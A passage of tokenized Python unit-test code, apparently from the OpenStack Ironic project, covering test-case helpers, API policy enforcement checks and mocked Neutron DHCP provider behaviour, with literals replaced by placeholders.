True ) <EOL> self . set_defaults ( connection = "<STR_LIT>" , <EOL> sqlite_synchronous = False , <EOL> group = '<STR_LIT>' ) <EOL> ironic_config . parse_args ( [ ] , default_config_files = [ ] ) <EOL> def _restore_obj_registry ( self ) : <EOL> objects_base . IronicObjectRegistry . _registry . _obj_classes = ( <EOL> self . _base_test_obj_backup ) <EOL> def _clear_attrs ( self ) : <EOL> for key in [ k for k in self . __dict__ . keys ( ) if k [ <NUM_LIT:0> ] != '<STR_LIT:_>' ] : <EOL> del self . __dict__ [ key ] <EOL> def config ( self , ** kw ) : <EOL> """<STR_LIT>""" <EOL> self . cfg_fixture . config ( ** kw ) <EOL> def set_defaults ( self , ** kw ) : <EOL> """<STR_LIT>""" <EOL> group = kw . pop ( '<STR_LIT>' , None ) <EOL> for o , v in kw . items ( ) : <EOL> self . cfg_fixture . set_default ( o , v , group = group ) <EOL> def path_get ( self , project_file = None ) : <EOL> """<STR_LIT>""" <EOL> root = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT:..>' , <EOL> '<STR_LIT:..>' , <EOL> ) <EOL> ) <EOL> if project_file : <EOL> return os . path . join ( root , project_file ) <EOL> else : <EOL> return root </s>
<s> from ironic . common import policy <EOL> from ironic . tests import base <EOL> class PolicyTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_admin_api ( self ) : <EOL> creds = ( { '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } ) <EOL> for c in creds : <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_public_api ( self ) : <EOL> creds = { '<STR_LIT>' : '<STR_LIT:True>' } <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) <EOL> def test_trusted_call ( self ) : <EOL> creds = ( { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT:True>' } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT:True>' } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> for c in creds : <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_show_password ( self ) : <EOL> creds = { '<STR_LIT>' : [ u'<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertTrue ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) <EOL> class PolicyTestCaseNegative ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_admin_api ( self ) : <EOL> creds = { '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) <EOL> def test_public_api ( self ) : <EOL> creds = ( { '<STR_LIT>' : '<STR_LIT:False>' } , { } ) <EOL> for c in creds : <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_trusted_call ( self ) : <EOL> creds = ( { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT:False>' } , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> for c in creds : <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , c , c ) ) <EOL> def test_show_password ( self ) : <EOL> creds = { '<STR_LIT>' : [ u'<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertFalse ( policy . enforce ( '<STR_LIT>' , creds , creds ) ) </s>
<s> import mock <EOL> from neutronclient . common import exceptions as neutron_client_exc <EOL> from neutronclient . v2_0 import client <EOL> from oslo_config import cfg <EOL> from oslo_utils import uuidutils <EOL> from ironic . common import dhcp_factory <EOL> from ironic . common import exception <EOL> from ironic . common import pxe_utils <EOL> from ironic . conductor import task_manager <EOL> from ironic . dhcp import neutron <EOL> from ironic . drivers . modules import ssh <EOL> from ironic . tests . unit . conductor import mgr_utils <EOL> from ironic . tests . unit . db import base as db_base <EOL> from ironic . tests . unit . objects import utils as object_utils <EOL> class TestNeutron ( db_base . DbTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestNeutron , self ) . setUp ( ) <EOL> mgr_utils . mock_the_extension_manager ( driver = '<STR_LIT>' ) <EOL> self . config ( <EOL> cleaning_network_uuid = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> self . config ( enabled_drivers = [ '<STR_LIT>' ] ) <EOL> self . config ( dhcp_provider = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> self . config ( url = '<STR_LIT>' , <EOL> url_timeout = <NUM_LIT:30> , <EOL> retries = <NUM_LIT:2> , <EOL> group = '<STR_LIT>' ) <EOL> self . config ( insecure = False , <EOL> certfile = '<STR_LIT>' , <EOL> admin_user = '<STR_LIT>' , <EOL> admin_tenant_name = '<STR_LIT>' , <EOL> admin_password = '<STR_LIT>' , <EOL> auth_uri = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> self . node = object_utils . create_test_node ( self . context ) <EOL> self . ports = [ <EOL> object_utils . create_test_port ( <EOL> self . context , node_id = self . node . id , id = <NUM_LIT:2> , <EOL> uuid = '<STR_LIT>' , <EOL> address = '<STR_LIT>' ) ] <EOL> self . neutron_port = { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_factory . DHCPFactory . _dhcp_provider = None <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_with_token ( self , mock_client_init ) : <EOL> token = '<STR_LIT>' <EOL> expected = { '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = token ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_without_token ( self , mock_client_init ) : <EOL> expected = { '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = None ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_with_region ( self , mock_client_init ) : <EOL> expected = { '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . config ( region_name = '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = None ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test__build_client_noauth ( self , mock_client_init ) : <EOL> self . config ( auth_strategy = '<STR_LIT>' , group = '<STR_LIT>' ) <EOL> expected = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_client_init . return_value = None <EOL> neutron . _build_client ( token = None ) <EOL> mock_client_init . assert_called_once_with ( ** expected ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test_update_port_dhcp_opts ( self , mock_client_init , mock_update_port ) : <EOL> opts = [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] <EOL> port_id = '<STR_LIT>' <EOL> expected = { '<STR_LIT:port>' : { '<STR_LIT>' : opts } } <EOL> mock_client_init . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . provider . update_port_dhcp_opts ( port_id , opts ) <EOL> mock_update_port . assert_called_once_with ( port_id , expected ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , "<STR_LIT>" ) <EOL> def test_update_port_dhcp_opts_with_exception ( self , mock_client_init , <EOL> mock_update_port ) : <EOL> opts = [ { } ] <EOL> port_id = '<STR_LIT>' <EOL> mock_client_init . return_value = None <EOL> mock_update_port . side_effect = ( <EOL> neutron_client_exc . NeutronClientException ( ) ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> self . assertRaises ( <EOL> exception . FailedToUpdateDHCPOptOnPort , <EOL> api . provider . update_port_dhcp_opts , <EOL> port_id , opts ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_update_port_address ( self , mock_client_init , mock_update_port ) : <EOL> address = '<STR_LIT>' <EOL> port_id = '<STR_LIT>' <EOL> expected = { '<STR_LIT:port>' : { '<STR_LIT>' : address } } <EOL> mock_client_init . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . provider . update_port_address ( port_id , address ) <EOL> mock_update_port . assert_called_once_with ( port_id , expected ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_update_port_address_with_exception ( self , mock_client_init , <EOL> mock_update_port ) : <EOL> address = '<STR_LIT>' <EOL> port_id = '<STR_LIT>' <EOL> mock_client_init . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> mock_update_port . side_effect = ( <EOL> neutron_client_exc . NeutronClientException ( ) ) <EOL> self . assertRaises ( exception . FailedToUpdateMacOnPort , <EOL> api . provider . update_port_address , <EOL> port_id , address ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_updo . assert_called_once_with ( '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp_no_vif_data ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> self . assertRaises ( exception . FailedToUpdateDHCPOptOnPort , <EOL> api . update_dhcp , task , self . node ) <EOL> self . assertFalse ( mock_updo . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp_some_failures ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> exc = exception . FailedToUpdateDHCPOptOnPort ( '<STR_LIT>' ) <EOL> mock_updo . side_effect = [ None , exc ] <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , self . node ) <EOL> mock_gnvi . assert_called_once_with ( task ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_updo . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_dhcp_fails ( self , mock_gnvi , mock_updo ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> exc = exception . FailedToUpdateDHCPOptOnPort ( '<STR_LIT>' ) <EOL> mock_updo . side_effect = [ exc , exc ] <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> self . assertRaises ( exception . FailedToUpdateDHCPOptOnPort , <EOL> api . update_dhcp , <EOL> task , self . node ) <EOL> mock_gnvi . assert_called_once_with ( task ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_updo . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_set_sleep_and_ssh ( self , mock_gnvi , mock_updo , <EOL> mock_ts ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> self . config ( port_setup_delay = <NUM_LIT:30> , group = '<STR_LIT>' ) <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> task . driver . power = ssh . SSHPower ( ) <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_ts . assert_called_with ( <NUM_LIT:30> ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch . object ( neutron , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_unset_sleep_and_ssh ( self , mock_gnvi , mock_updo , <EOL> mock_ts , mock_log ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> task . driver . power = ssh . SSHPower ( ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> self . assertTrue ( mock_log . warning . called ) <EOL> self . assertIn ( '<STR_LIT>' , <EOL> mock_log . warning . call_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> mock_ts . assert_called_with ( <NUM_LIT:15> ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch . object ( neutron , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_set_sleep_and_fake ( self , mock_gnvi , mock_updo , <EOL> mock_ts , mock_log ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> self . config ( port_setup_delay = <NUM_LIT:30> , group = '<STR_LIT>' ) <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_log . debug . assert_called_once_with ( <EOL> "<STR_LIT>" , <NUM_LIT:30> ) <EOL> mock_log . warning . assert_not_called ( ) <EOL> mock_ts . assert_called_with ( <NUM_LIT:30> ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> @ mock . patch . object ( neutron , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' , <EOL> autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def test_update_dhcp_unset_sleep_and_fake ( self , mock_gnvi , mock_updo , <EOL> mock_log ) : <EOL> mock_gnvi . return_value = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { } } <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> opts = pxe_utils . dhcp_options_for_instance ( task ) <EOL> api = dhcp_factory . DHCPFactory ( ) <EOL> api . update_dhcp ( task , opts ) <EOL> mock_log . debug . assert_not_called ( ) <EOL> mock_log . warning . assert_not_called ( ) <EOL> mock_updo . assert_called_once_with ( mock . ANY , '<STR_LIT>' , opts , <EOL> token = self . context . auth_token ) <EOL> def test__get_fixed_ip_address ( self ) : <EOL> port_id = '<STR_LIT>' <EOL> expected = "<STR_LIT>" <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> port_data = { <EOL> "<STR_LIT:id>" : port_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> fake_client = mock . Mock ( ) <EOL> fake_client . show_port . return_value = { '<STR_LIT:port>' : port_data } <EOL> result = api . _get_fixed_ip_address ( port_id , fake_client ) <EOL> self . assertEqual ( expected , result ) <EOL> fake_client . show_port . assert_called_once_with ( port_id ) <EOL> def test__get_fixed_ip_address_invalid_ip ( self ) : <EOL> port_id = '<STR_LIT>' <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> port_data = { <EOL> "<STR_LIT:id>" : port_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> fake_client = mock . Mock ( ) <EOL> fake_client . show_port . return_value = { '<STR_LIT:port>' : port_data } <EOL> self . assertRaises ( exception . InvalidIPv4Address , <EOL> api . _get_fixed_ip_address , <EOL> port_id , fake_client ) <EOL> fake_client . show_port . assert_called_once_with ( port_id ) <EOL> def test__get_fixed_ip_address_with_exception ( self ) : <EOL> port_id = '<STR_LIT>' <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> fake_client = mock . Mock ( ) <EOL> fake_client . show_port . side_effect = ( <EOL> neutron_client_exc . NeutronClientException ( ) ) <EOL> self . assertRaises ( exception . FailedToGetIPAddressOnPort , <EOL> api . _get_fixed_ip_address , port_id , fake_client ) <EOL> fake_client . show_port . assert_called_once_with ( port_id ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address ( self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> port = object_utils . create_test_port ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_port_ip_address ( task , port , <EOL> mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> mock_gfia . assert_called_once_with ( '<STR_LIT>' , mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address_for_portgroup ( self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> pg = object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_port_ip_address ( task , pg , <EOL> mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> mock_gfia . assert_called_once_with ( '<STR_LIT>' , mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address_with_exception ( self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> port = object_utils . create_test_port ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> self . assertRaises ( exception . FailedToGetIPAddressOnPort , <EOL> api . _get_port_ip_address , task , port , <EOL> mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_port_ip_address_for_portgroup_with_exception ( <EOL> self , mock_gfia ) : <EOL> expected = "<STR_LIT>" <EOL> pg = object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = expected <EOL> with task_manager . acquire ( self . context , <EOL> self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> self . assertRaises ( exception . FailedToGetIPAddressOnPort , <EOL> api . _get_port_ip_address , task , pg , <EOL> mock . sentinel . client ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_ip_addresses_ports ( self , mock_gfia ) : <EOL> ip_address = '<STR_LIT>' <EOL> expected = [ ip_address ] <EOL> port = object_utils . create_test_port ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = ip_address <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_ip_addresses ( task , [ port ] , <EOL> mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__get_ip_addresses_portgroup ( self , mock_gfia ) : <EOL> ip_address = '<STR_LIT>' <EOL> expected = [ ip_address ] <EOL> pg = object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> mock_gfia . return_value = ip_address <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . _get_ip_addresses ( task , [ pg ] , mock . sentinel . client ) <EOL> self . assertEqual ( expected , result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_ip_addresses ( self , get_ip_mock ) : <EOL> ip_address = '<STR_LIT>' <EOL> expected = [ ip_address ] <EOL> get_ip_mock . return_value = ip_address <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> result = api . get_ip_addresses ( task ) <EOL> get_ip_mock . assert_called_once_with ( task , task . ports [ <NUM_LIT:0> ] , <EOL> mock . ANY ) <EOL> self . assertEqual ( expected , result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_ip_addresses_for_port_and_portgroup ( self , get_ip_mock ) : <EOL> object_utils . create_test_portgroup ( self . context , <EOL> node_id = self . node . id , <EOL> address = '<STR_LIT>' , <EOL> uuid = uuidutils . generate_uuid ( ) , <EOL> extra = { '<STR_LIT>' : <EOL> '<STR_LIT>' } , <EOL> driver = '<STR_LIT>' ) <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> api . get_ip_addresses ( task ) <EOL> get_ip_mock . assert_has_calls ( <EOL> [ mock . call ( task , task . ports [ <NUM_LIT:0> ] , mock . ANY ) , <EOL> mock . call ( task , task . portgroups [ <NUM_LIT:0> ] , mock . ANY ) ] ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports ( self , create_mock ) : <EOL> create_mock . return_value = { '<STR_LIT:port>' : self . neutron_port } <EOL> expected = { self . ports [ <NUM_LIT:0> ] . uuid : self . neutron_port [ '<STR_LIT:id>' ] } <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> ports = api . create_cleaning_ports ( task ) <EOL> self . assertEqual ( expected , ports ) <EOL> create_mock . assert_called_once_with ( { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : self . ports [ <NUM_LIT:0> ] . address } } ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports_fail ( self , create_mock , rollback_mock ) : <EOL> create_mock . side_effect = neutron_client_exc . ConnectionFailed <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . create_cleaning_ports , <EOL> task ) <EOL> create_mock . assert_called_once_with ( { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : self . ports [ <NUM_LIT:0> ] . address } } ) <EOL> rollback_mock . assert_called_once_with ( task ) <EOL> @ mock . patch . object ( neutron . NeutronDHCPApi , '<STR_LIT>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) <EOL> def test_create_cleaning_ports_fail_delayed ( self , create_mock , <EOL> rollback_mock ) : <EOL> """<STR_LIT>""" <EOL> mockport = mock . MagicMock ( ) <EOL> create_mock . return_value = mockport <EOL> mockport . get . return_value = True <EOL> mockitem = mock . Mock ( ) <EOL> mockport . __getitem__ . return_value = mockitem <EOL> mockitem . get . return_value = None <EOL> api = dhcp_factory . DHCPFactory ( ) . provider <EOL> with task_manager . acquire ( self . context , self . node . uuid ) as task : <EOL> self . assertRaises ( exception . NodeCleaningFailure , <EOL> api . create_cleaning_ports , <EOL> task ) <EOL> create_mock . assert_called_once_with ( { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : self . ports [ <NUM_LIT:0> ] . address } } ) <EOL> rollback_mock . assert_called_once_with ( task ) <EOL> mockport . get . assert_called_once_with ( '<STR_LIT:port>' ) <EOL> mockitem . get . assert_called_once_with ( '<STR_LIT:id>' ) <EOL> mockport . __getitem__ . assert_called_once_with ( '<STR_LIT:port>' ) <EOL> @ mock . patch . object ( client . Client , '<STR_LIT>' ) 